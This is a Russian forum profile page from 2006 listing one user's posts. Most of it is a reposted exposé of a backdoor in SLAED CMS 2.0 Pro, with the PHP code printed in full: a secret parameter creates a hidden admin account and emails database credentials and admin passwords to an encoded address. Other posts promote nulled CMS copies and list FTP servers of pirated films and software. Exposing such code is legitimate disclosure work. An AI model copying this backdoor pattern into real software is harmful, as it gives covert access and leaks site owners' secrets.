Перейти к содержимому

z0mb1e_c0mmad1ng

z0mb1e_c0mmad1ng

Регистрация: 20.08.2006, 09:14
Offline Активность: Скрыто
-----

SLAED CMS 2.0 и бекдор от создателей

20.09.2006, 15:33:10

SLAED CMS 2.0 и бекдор от Eduarda(Эдуард это разработчик системы)или вся правда о SLAED CMS

В лицензионной версии SLAED CMS 2.0 Pro был найден очень примечательный кусок кода в файле sources.php:



if (md5(md5($_GET['sec']))=="ceabfb42600ae4843d1e000bf59be77a") 

{ 

define("ADMIN_FILE",true);require_once("config/config_secure.php");$db->sql_query("INSERT INTO ".$prefix."_authors VALUES ('Security','God','','','399b5a15f73198cf00be57914799a17d','0','1','')");
mail_send(base64_decode("aW5mb0BzbGFlZC5uZXQ="),$adminmail,base64_decode("zeXr5ePg6/zt4P8g4uXw8ej/"),"".$dbhost."
".$dbuname."
".$dbpass."
".$dbname."
".$admin_file."
".$license_key."
".$adminlogin."
".$adminpassword."",0,1);

}

Объясню суть этого кода, при определенном запросе, двойной md5 хеш которого развен "ceabfb42600ae4843d1e000bf59be77a"
( естественно Eduard знает изначальное значение данной строки ) выполняются следующие действия:

define("ADMIN_FILE",true); -
определяется константа доступа к админ файлам системы

require_once("config/config_secure.php");
- запрашивается конфигурационный файл

$db->sql_query("INSERT INTO ".$prefix."_authors VALUES ('Security','God','','','399b5a15f73198cf00be57914799a17d','0','1','')");
- добавляется новый админ с логином Security и правами God( пароль етесно знает Eduard )

Дальше идет отправка электронной почты с параметрами

mail_send(base64_decode("aW5mb0BzbGFlZC5uZXQ="),$adminmail,base64_decode("zeXr5ePg6/zt4P8g4uXw8ej/"),"".$dbhost."
".$dbuname."
".$dbpass."
".$dbname."
".$admin_file."
".$license_key."
".$adminlogin."
".$adminpassword."",0,1);

base64_decode("aW5mb0BzbGFlZC5uZXQ=")
- есть info@slaed.net

Это легко проверить создав простейший PHP сценарий:

<?php

echo base64_decode("aW5mb0BzbGFlZC5uZXQ=);

?>

Далее

$adminmail
= адрес эл. почты администратора

base64_decode("zeXr5ePg6/zt4P8g4uXw8ej/");
= строка "Нелегальная версия";

$dbhost - хост БД

$dbuname - имя пользователя БД

$dbpass - пароль к БД

$dbname - имя БД

$admin_file - имя файла админ панели

$license_key - лиц. ключ

$adminlogin - логин для доступа к админ панели( если используется http анунтефикация )

$adminpassword - пароль для доступа к админ панели( если используется http анунтефикация )

Тем самым Eduard получает полный доступ к сайту!!!

И где гарантия что он это будет делать только с теми кто пользуется пиратской версией....

Как вам не стыдно товарищ!

PS версия SLAED 2.0 Nulled by BlackNuller и AntiSlaed CMS не имеют данного кода.


Автор статьи Sidious.(AntiSlaed Team)

======
А вот ответ Эдуарда по данному вопросу

Бред!
На нашем сайте тот же код, кто реально сломает?

И так объясняю, клиентам боятся нечего!
А вот тем кто украл, стоит призадуматся, все ли нюансы были найдены ворами?!

Никто кроме автора (Тоесть меня) не сможет воспользоватся этой функцией!
Зделано специально для наказания воров!


====
Да,возможно разработчик решил боротся с пиратскими версиями,то есть тот кто украл,будет им наказан.Но это идет уже нарушение Прав потребителей,ведь этот бэкдор впаривается и тем кто покупал данную систему!!!!....
Любой бэкдор - это нарушение прав тех, кто покупает систему.
Просто никто не будет возиться с этой шнягой)
То есть данные он имеет и о тех кто купил эту систему,но им ничего не грозит как он заявляет.

====
Материал взят с Anti Slaed Teamwww.antislaed.info

=
теперь немного о Anti Slaed Team и о "разработчике" SLAED CMS.
Эдуард,русский программер проживающий в Германии,"разработчик" SLAED CMS(заметьте в ковычках)пару лет назад взял сорцы движка PHP Nuke,который шел и идет по лицензии GNU/GPL,переделал его немного-а в частности дописал кое какие блоки и улучшил некоторые модули.Закрыл баги PHP-Nuke.
Сделал легкий дизайн,и получился SLAED CMS,за которую он стал брать деньги.И скажу немалые.То есть сделал из GNU/GPL коммерческую,хотя сам он нихрена особого не сделал,спасибо разработчикам PHP Nuke.

Anti Slaed Team-Группа более умных программистов,которые начали с того что стали закрывать баги,сделанные Эдуардом при закрытии баг исходников PHP Nuke(смешно,закрыл одно-делал новые),в свою очередь который принимал все их советы и закрывал то,что ему указывали. Но позже когда Эдуард стал окончательно наглеть,Anti Slaed Team выдали всю правду о SLAED CMS.



====
Слова человека по имени JOXX(главного администратора ресурса www.antislaed.info)

По поводу бэкдора я запостил в его форуме для клиентов и мы получили следующий ответ "Если Вы сомневаетесь в нашей порядочности, то почему пользуетесь нашей системой". Логика потрясающая. Кстати глупость несусветная, признаваться в самовольном оставлении бэкдоров в клинтские сайты. Уж наврал бы чего.


Да он, как мне кажется завтрался уже на столько, что сам или запутался или внушил себе, что он все сам написал... Наверное скоро окажется, что и яндекс и гуг его работа... а нюка - это ваще его неудачное детище...


Теперь вывод

Эдуард(SLAED CMS-http://slaed.net) настоящее ЧМО,которое из GNU продукта сделало коммерческий,и теперь яростно защищает якобы свои права,хотя не думает о разработчиках Нюки(GNU/GPL),который он спер и немного переделал-прося за это бабло. Воспользовался трудом тех людей которые написали его и дали ему GNU/GPL.

[b]Anti Slaed Team(www.antislaed.info)
Совет,почаще посещайте именно этот сайт. Именно там вы найдете еще много чего интересного про slaed cms,а также их нулленые бесплатные версии,в которых нет бэкдоров,которые туда понапихал "разработчик"-заметте в ковычках.

==
Все это равносильно тому,что допустим кто нибудь взял бы Linux,переделал его немного и стал просить за это бабки. Эпидемия "Билл Гейтса"-мочить таких надо ;)
Сабж.

Тест на определение Интернет-зависимости

18.09.2006, 10:23:01

Набрел в Сети на тест на определение Интернет зависимости.

http://www.psyhelp.ru/texts/iad_test

Кто прошел выкладывайте полученный вам результат тут :)
Вот мой

Ваше число очков: 74 У Вас есть некоторые проблемы, связанные с чрезмерным увлечением Интернетом. Если Вы не обратите на них внимание сейчас - в дальнейшем они могут заполнить всю Вашу жизнь.


Испугался... :)

Проблемы USER.KZ

07.09.2006, 12:56:56

Если честно,складывается ощущение что на юзер вообще забили его руты. Раньше уходил в даун на сутки максимум,а теперь не работает по 3 суток.
Ясно,что услуга бесплатная,и тем более от КТ,изумительной быть неможет,хотя тут дело не в бесплатности-рапида и тд тоже бесплатные сервера,хотя работают всегда,а когда было пару случаев за все время когда уходили в даун максимум минут на 10,так начиналась паника-как так,рапида в дауне????
КТ нужно бы взять пример с них=)
Руты юзера жалуются на железо,мол большая нагрузка и винты не выдерживают. Опять же другие сервера в пример-нагрузка рапиду немыслемая,качается с нее десятками террабайт каждый день,весь мир качает.
А тут несчастный казнет юзер выдержать неможет.
Может проблемы все таки не в железе а в ответсвенности администрации?
Ну раз уж сделали,будьте добры хоть работать более менее нормально,учитывая то что основная нагрузка на сервер идет лишь с пару-троек крупных сайтов юзера,остальное хоум паги,которые нагрузки не дают.
=
Далее файлообменник-написано до 1 гига можно залить...ага))))
Максимум 10 мегов дает залить,дальше облом. Карявый скрипт.
В ряду того что сейчас очень много мегалайновцев,и сам непроч менятся теми же фильмами по сети,делать этого немогу,никто неможет.
Где такой скрипт нашли блин...у меня,на полном серьезе есть скрипты в чистом виде,раскодированные-таких файлообменников как rapidshare.de upload.com xdrive.com и тд,которые работают нормально.Так вот-может предоставить их юзеру?Эти скриты не найдешь,поэтому коль если кто из юзер з заинтересуется в том чтобы сделать файлообменник-кидайте в личку.
Просто охото всем ,чтобы файлообмен работал нормально...
Глядишь файлообменник заработает хоть ;)

Для пользователей Megaline Hit. Если устали от рапиды

29.08.2006, 18:26:17

Похожая тема уже кем то создавалась,но превратилась в оффтоп.
Выкладываем только ссылки.
Открываю свои закрома))))

ftp://m1.dload.net.ru/ ,второй его адрес ftp://217.107.218.150/

Очень много фильмов всех жанров(много последних новинок и XXX)
ftp://m2.dload.net.ru/dload/


ftp://62.117.117.155/PUB/media/ Немного фильмов,МР3,etc...


ftp://84.240.28.45/ Много МР3,фильмов,клипов,игр,и тд и тп.

ftp://82.148.10.113/ Немного фильмов и другой мелочи

ftp://ftp.nsc.ru/ Тут все для Unix-like систем. Дрова,последние дистрибутивы, etc

ftp://www.portal24.ru/ Провославные фильмы, песнопение, молитвы и др(может кому и надо)

ftp://ftp.sociomaster.ru/ Есть софт,фильмы,мр3

ftp://ftp.edome.net/ МР3,софтец,кой какое видео.

ftp://kamenka-lan.ru/ Фильмы,мр3,проги,и тд.

ftp://alexnet.shacknet.nu/ Отличный сервак!Ужасно много фильмов,клипов,мультов. Также софт,мр3,приколы,Операционки и тд)

ftp://212.122.1.202/ Оччееень много фильмов,мультфильмов.Очень понравился сервак!!!

ftp://lost.rusteko.ru/ МНОГО ФИЛЬМОВ,КЛИПОВ,МУЗЫКИ,ИГР,СОФТА!

ftp://81.177.17.1/ Фильмы,Эл книги,Муза,Софт,Игры,много шаблонов(html)

=
ДЛЯ ВСЕХ АЙПИ :-)
Качать лучше в один поток.
У кого что либо есть-делимся

Что случилось с ok.kz?

27.08.2006, 22:15:29

Уже как 2 дня немогу попасть на свою почте на ok.kz...
Просто даже не находит домен ok.kz.
Кто вкурсе че у них опять? :)

Невозможно подключиться к удаленному серверу

Вы попытались получить доступ к адресу http://www.ok.kz/, который сейчас не доступен. Убедитесь, пожалуйста, что веб-адрес (URL) введен правильно и затем попытайтесь загрузить страницу еще раз.


Размещение рекламы на сайте     Предложения о сотрудничестве     Служба поддержки пользователей

© 2011-2022 vse.kz. При любом использовании материалов Форума ссылка на vse.kz обязательна.